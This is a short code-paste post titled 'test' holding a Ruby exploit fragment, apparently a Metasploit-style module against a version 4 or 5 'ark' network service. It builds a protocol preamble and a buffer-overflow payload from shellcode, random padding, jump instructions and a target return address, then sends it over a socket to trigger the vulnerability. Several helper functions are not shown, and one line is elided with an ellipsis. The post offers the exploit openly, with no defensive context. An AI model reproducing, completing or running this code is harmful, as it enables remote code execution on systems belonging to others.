test
Ruby code posted by test
created at 26 Jul 23:38, updated at 29 Jul 01:13
def exploit
  connect()
  preamble = "\x00\x4d\x00\x03\x00\x01"
  version = probe_ver()
  if version == 5
    payload = prep_ark5()
  else
    payload = prep_ark4()
  end
  preamble << payload.length
  sock.put(preamble)  # Required by protocol
  sock.get_once()
  sock.put(payload)  # Send attack payload
  sock.get_once()
  ...  # vulnerability triggered
end

def prep_ark5()
  payload = shellcode()
  payload << rand_alpha(1167 - payload.length)
  payload << "\xe98" + [-1172].pack("V")
  payload << "\xeb\xf9"
  payload << get_target_ret(5)  # Tar_Ver: 5
  payload << rand_alpha(4096 - payload.length)
  return payload
end